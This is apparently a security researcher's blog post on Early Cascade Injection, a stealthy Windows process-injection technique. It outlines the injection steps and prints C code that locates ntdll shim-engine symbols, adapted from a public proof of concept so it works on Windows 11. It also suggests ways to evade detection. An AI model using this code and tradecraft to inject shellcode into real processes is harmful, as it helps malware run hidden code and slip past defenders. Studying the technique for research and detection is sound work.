Early Cascade Injection
learning about early cascade injection, fixing for Win11, disassembly nonsense
Intro
Early Cascade injection was documented by Outflank as a novel process injection technique. The technique requires locating and modifying specific symbols in the .data
and .mrdata
sections of ntdll.dll
in a remote process, which enables code execution via a callback routine.
This blog post will not go into all of the details of the technique, since it was covered in the original research blog post.
Instead, this blog post will cover how I played with the proof-of-concept code from @5pider and reversed a method to find offsets needed to execute on Windows 11 targets.
Here is my very simplified overview of the steps performed during the injection method:
- Spawn a process in a suspended state.
- Locate the offsets to
g_ShimsEnabled
&g_fnSE_DllLoaded
inside ofntdll.dll
. - Set
g_ShimsEnabled
boolean to1
(true) in the suspended process. - Overwrite the function pointer for
g_fnSE_DllLoaded
with the address of shellcode stub. - Resume the thread.
- Shellcode stub immediately flips
g_ShimsEnabled
back to false (0
). - Shellcode stub queues an APC routine which executes after
LdrInitializeThunk
routine.
Finding Offsets
A crucial step for this injection technique is the ability to locate the addresses of:
g_ShimsEnabled
boolean valueg_fnSE_DllLoaded
function pointer
g_pfnSE_DllLoaded
is located in the .mrdata
section and g_ShimsEnabled
is in the .data
section of ntdll.dll
.
I found this helper function on Twitter from @m4ul3r_0x00 to help locate the memory addresses of those values in order to modify them later.
VOID FindOffsets()
{
PBYTE ptr;
ULONG offset1, offset2;
int i = 0;
// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
if (!ptr) {
printf("[!] Failed to locate RtlQueryDepthSList\\n");
return;
}
// Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
while (i != 2) {
if (*(PWORD)ptr == 0xCCC3) {
i += 1;
}
ptr++;
}
// Scan memory until 0x488B3D pattern (mov rdi, qword [rel g_pfnSE_DllLoaded])
while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
ptr++;
}
// [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3); // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
g_pfnSE_DllLoaded = ptr + offset1 + 7; // Find absolute address of g_pfnSE_DllLoaded (8 bytes)
// Scan memory until 0x443825 pattern (cmp byte [rel g_ShimsEnabled], r12b)
while ((*(PDWORD)ptr & 0xFFFFFF) != 0x253844) {
ptr++;
}
// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3); // Add 3 bytes to get to [rel g_ShimsEnabled]
g_ShimsEnabled = ptr + offset2 + 7; // Find absolute address of g_ShimsEnabled (8 bytes)
}
Here is a breakdown of the function:
- Finding
g_pfnSE_DllLoaded
- The first while loop tries to move the pointer to the end of the
LdrpInitShimEngine
function by matching the byte pattern for the end of a function0xC3CC
. (it’s reversed because little-endian) - Then the next while loop searches for the next byte pattern which matches the instructions
mov rdi, qword [rel g_pfnSE_DllLoaded]
, but only matches the first 3 bytes0x488B3D
by using the mask0xFFFFFF
. - It determines the index pointer is now only 3 bytes away from the relative address of
g_pfnSE_DllLoaded
. - So add 3 bytes to the current index to land at
[rel g_pfnSE_DllLoaded]
, then you can calculate the absolute address ofg_pfnSE_DllLoaded
.
- The first while loop tries to move the pointer to the end of the
// [ptr is here now] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3); // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
g_pfnSE_DllLoaded = ptr + offset1 + 7; // Find absolute address of g_pfnSE_DllLoaded (8 bytes)
- Finding
g_ShimsEnabled
- Then the last while loop searches for the byte pattern which matches the instructions
cmp byte [rel g_ShimsEnabled], r12b
(remember this for later 😉). - After it finds the pattern it does the same as above and calculates the absolute address of
g_ShimsEnabled
- Then the last while loop searches for the byte pattern which matches the instructions
// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3); // Add 3 bytes to get to [rel g_ShimsEnabled]
g_ShimsEnabled = ptr + offset2 + 7; // Find absolute address of g_ShimsEnabled (8 bytes)
After the memory addresses for these global symbols are located the rest of the cascade injection technique can continue.
The Problem
This code worked fine when I tested on Windows 10, but failed on Windows 11 😢.
I decided to try and ‘fix’ this to also work on Windows 11.
My hypothesis:
The memory signatures inside ofntdll.dll
in this PoC are probably not exactly the same on Windows 11, so the code fails to locate eitherg_ShimsEnabled
org_pfnSE_DllLoaded
or both.
Let’s Fix It ⚒️
In order for this injection method to work on Windows 11 we have to reproduce the methodology above or come up with a more reliable method of locating the addresses.
Debugging NTDLL.DLL
So I loaded ntdll.dll
into Binary Ninja on a Windows 11 machine with debug symbols to start analyzing the PE file.
As you saw in the function above, it first gets the address of the exported function RtlQueryDepthSList
.
// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlQueryDepthSList");
if (!ptr) {
printf("[!] Failed to locate RtlQueryDepthSList\\n");
return;
}
In Binja we can browse to the Symbols tab to view all functions since we have debug symbols included in the DLL. I searched for the symbol of function and clicked into it to start analyzing it.
Great, next the PoC counted down 2 functions by looking for ret
instructions (0xC3CC
).
// Scan memory until end of LdrpInitShimEngine (0xC3CC pattern)
while (i != 2) {
if (*(PWORD)ptr == 0xCCC3) {
i += 1;
}
ptr++;
}
The code was nicely commented, so I knew it expected the pointer to land at the end of LdrpInitShimEngine
after this.
Wait! In the screenshot above you can see the 3rd function down is RtlAllocateAndInitializeSid
not LdrpInitShimEngine
.
The functions in ntdll.dll
appear to be in a different order on Windows 11. At least now we know where to begin…
Reversing Original PoC
First I needed to figure out why the PoC chose the end of LdrpInitShimEngine
as the function to stop after.
I determined it was chosen because the next function was supposed to be LdrpLoadShimEngine
which contains two VERY important instructions in it:
mov rdi, qword [rel g_pfnSE_DllLoaded]
cmp byte [rel g_ShimsEnabled], r13b
LdrpLoadShimEngine
references both of the variables we need by their relative addresses. This means that we can grab those addresses and calculate their absolute addresses in memory.
This is what the function for Win10 does.
So I basically stuck with the original PoC’s methodology to get it working for Win11.
The function will do the following:
- Find the closest exported function to
LdrpLoadShimEngine
. - Get the address of that exported function.
- Move the index pointer ‘x’ number of
ret
's until it’s atLdrpLoadShimEngine
. - Look for the byte pattern that references the variable’s relative address’s.
- Calculate their absolute address’s.
- Finish the injection steps.
Find the Closest Exported Function
The ntdll.dll
library has many exported and non-exported functions. For any exported function we could simply use GetProcAddress
in order to get a pointer to the function. But since LdrpLoadShimEngine
is not an exported function we have to find the closest exported one and then count forwards (or backwards).
We can start at LdrpLoadShimEngine
and count backwards until we see an exported function.
Six (6) ret
’s above we can see RtlUnlockMemoryBlockLookaside
which is an exported function, meaning we can easily get the address to it with GetProcAddress
.
Now we can update our code to use RtlUnlockMemoryBlockLookaside
as the starting function and count 6 ret
’s down to find LdrpLoadShimEngine
.
// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
if (!ptr) {
printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\\n");
return;
}
// Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
while (i != 6) {
if (*(PWORD)ptr == 0xCCC3) {
i += 1;
}
ptr++;
}
Fixing Byte Signature
Now there is just one more thing to address. I found while analyzing LdrpLoadShimEngine
that Win11 uses a different register for the cmp
instruction.
// Windows 10
cmp byte [rel g_ShimsEnabled], **r12b**
// Windows 11
cmp byte [rel g_ShimsEnabled], **r13b**
Win10 uses r12b
but Win11 uses r13b
. This means that the pattern matching logic from the PoC will fail to find the correct address since the bytes are different.
We can easily update the code to check for 0x44382D
instead of 0x443825
.
while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
ptr++;
}
Final Thoughts
After making those changes to the function I was able to successfully execute the injection method on Windows 11.
The final updated function looks like this:
// Values to overwrite in NTDLL
PVOID g_pfnSE_DllLoaded = NULL;
PVOID g_ShimsEnabled = NULL;
/*
* Locate g_ShimsEnabled and g_pfnSE_DllLoaded on Windows 11
*/
VOID FindOffsetsWin11()
{
/*
On Windows 11, functions are ordered differently inside ntdll.
We want to find RtlUnlockMemoryBlockLookaside because it's the closest exported function to
LdrpLoadShimEngine (which contains the instructions we want).
*/
PBYTE ptr;
ULONG offset1, offset2;
int i = 0;
// Get the starting address
ptr = (PBYTE)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlUnlockMemoryBlockLookaside");
if (!ptr) {
printf("[!] Failed to locate RtlUnlockMemoryBlockLookaside\\n");
return;
}
// Scan memory until end of LdrpInitializeDllPath function. The next function will be LdrpLoadShimEngine
while (i != 6) {
if (*(PWORD)ptr == 0xCCC3) {
i += 1;
}
ptr++;
}
/*
Should locate byte pattern inside of LdrpLoadShimEngine.
Looking for 0x488B3D (mov rdi, qword [rel g_pfnSE_DllLoaded])
*/
while ((*(PDWORD)ptr & 0xFFFFFF) != 0x3D8B48) {
ptr++;
}
// [ptr is here] mov rdi, qword [rel g_pfnSE_DllLoaded]
offset1 = *(PULONG)(ptr + 3); // Add 3 bytes to get to [rel g_pfnSE_DllLoaded]
g_pfnSE_DllLoaded = ptr + offset1 + 7; // Find absolute address of function pointer g_pfnSE_DllLoaded (8 bytes)
/*
Should locate byte pattern inside of LdrpLoadShimEngine.
Looking for 0x44382D (cmp byte [rel g_ShimsEnabled], r13b)
*/
while ((*(PDWORD)ptr & 0xFFFFFF) != 0x2D3844) {
ptr++;
}
// [ptr is here] cmp byte [rel g_ShimsEnabled], r12b
offset2 = *(PULONG)(ptr + 3); // Add 3 bytes to get to [rel g_ShimsEnabled]
g_ShimsEnabled = ptr + offset2 + 7; // Find absolute address of g_ShimsEnabled (8 bytes)
}
Improvements
I had the AI wizard generate me a function to determine the Windows version then execute the correct FindOffsets function.
Some improvements to this code could be:
- Avoid suspicious WinAPI calls (
GetProcAddress
,GetModuleHandleA
,WriteProcessMemory
,ResumeThread
) - More reliable method of locating the symbols in NTDLL
The final code can be found on my GitHub here.
Credits
- Original research - https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/
- PoC from 5pider - https://github.com/Cracked5pider/earlycascade-injection
- function to find symbols from @m4ul3r_0x00 https://x.com/m4ul3r_0x00/status/1856362500310143174